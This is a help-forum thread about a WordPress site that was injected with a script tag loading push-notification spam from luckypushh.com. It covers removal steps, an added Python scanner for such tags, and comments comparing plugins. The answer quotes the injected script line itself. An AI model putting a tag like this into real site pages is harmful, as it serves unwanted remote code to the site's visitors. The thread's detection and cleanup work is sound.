
I was contacted by a friend who said that a pop-up box started appearing, just like the one which asks for browser notification permission. On examining the box, it turned out to be malware

1 Answer

Best answer

I was contacted by a friend who said that a pop-up box started appearing, just like the one which asks for browser notification permission. On examining the box, it turned out to be malware pushing subscriptions for a website, Luckypushh . com

At the time of writing I couldn't pinpoint the exact plugin which injected it, but as the last two updated apps were All In One SEO and Sucuri Defender, the strongest chances are of these two plugins.

The following code was injected on the blog:

<script src="//luckypushh.com/ntfc.php?p=xxx" data-cfasync="false" async=""></script>

A Google search didn't show much about luckypushh.com, just that the domain was registered on 30 March 2018. There are 125 indexed searches on Google with the same injected code but a different parameter number.

On clicking "Allow" in the fake notification subscriber, it opens up a pop-up box, which prompts an actual browser notification for the website "Luckypushh.com".

How to Remove LuckyPussh Notification Subscribe Malware

Open your WordPress Dashboard and go to Appearance > Editor, select the "header" file and remove the script tags highlighted at Line 8.

Any information on the actual culprit would be highly appreciated so that I may add to it and remove the bloody plugin for good
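An added example, not part of the original answer and not code from any plugin named here: since the tag is not always in the header file, this Python script searches a whole `wp-content` tree for the injected tag shown above and lists any other script tags loaded from hosts outside an allowlist. The function names, the `allowed_hosts` parameter and the sample files are assumptions constructed for illustration.

```python
import re
from pathlib import Path
# Added example; function names and allowed_hosts are illustrative assumptions.
# Indicator from the post: <script src="//luckypushh.com/ntfc.php?p=...">
INDICATOR = re.compile(r"luckypushh\.com/ntfc\.php\?p=([^\"'&\s>]+)", re.I)
# Any script tag whose src is on another host (http://, https:// or //host)
EXTERNAL_SCRIPT = re.compile(
    r"<script\b[^>]*\bsrc\s*=\s*[\"']?(?:https?:)?//([^/\"'\s>]+)", re.I)
SCAN_SUFFIXES = {".php", ".html", ".htm", ".js"}

def scan_tree(root, allowed_hosts=()):
    """Return (relative path, line number, kind, detail) for each suspect line."""
    root = Path(root)
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        rel = path.relative_to(root).as_posix()
        text = path.read_text(encoding="utf-8", errors="replace")
        for lineno, line in enumerate(text.splitlines(), 1):
            hit = INDICATOR.search(line)
            if hit:  # exact match on the tag from the post; record its p= value
                findings.append((rel, lineno, "indicator", "p=" + hit.group(1)))
                continue
            for m in EXTERNAL_SCRIPT.finditer(line):
                host = m.group(1).lower()
                if host not in allowed:  # unknown third-party script: review it
                    findings.append((rel, lineno, "external-script", host))
    return findings

def build_sample_tree(root):
    """Constructed sample data: a theme header carrying the injected tag on line 8."""
    theme = Path(root) / "themes" / "example-theme"
    theme.mkdir(parents=True)
    (theme / "header.php").write_text("\n".join([
        "<!DOCTYPE html>", "<html>", "<head>", '<meta charset="utf-8">',
        "<title>Example</title>",
        '<script src="https://cdn.example.org/lib.js"></script>',
        "<?php wp_head(); ?>",
        '<script src="//luckypushh.com/ntfc.php?p=xxx" data-cfasync="false" async=""></script>',
        "</head>"]), encoding="utf-8")
    (theme / "footer.php").write_text(
        '<script src="/wp-includes/js/local.js"></script>\n</body></html>', encoding="utf-8")

if __name__ == "__main__":
    import sys
    for finding in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "wp-content"):
        print(*finding, sep="\t")
```

The script only reads files on disk, so content stored in the database is not covered. Findings of kind `external-script` are candidates for review, not confirmed injections.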

commented ago by
I've had the same problem. I didn't find the LuckyPussh code in the header so restored a backup of the site. I'm not using either of the plugins you mentioned, maybe we could compare plugins and see if we have any in common? My site is using the GeneratePress theme with the free version of Elementor.
commented ago by
Were you by any chance using Easy Facebook Likebox? I suspect it might be the culprit.
commented ago by
Can you link to a recent plugin update and this issue appearing?

We can, you can email me your plugin list... I'll email you the plugin list of the above-mentioned blog.

No, the blog doesn't have Easy Facebook Likebox...

This makes it weird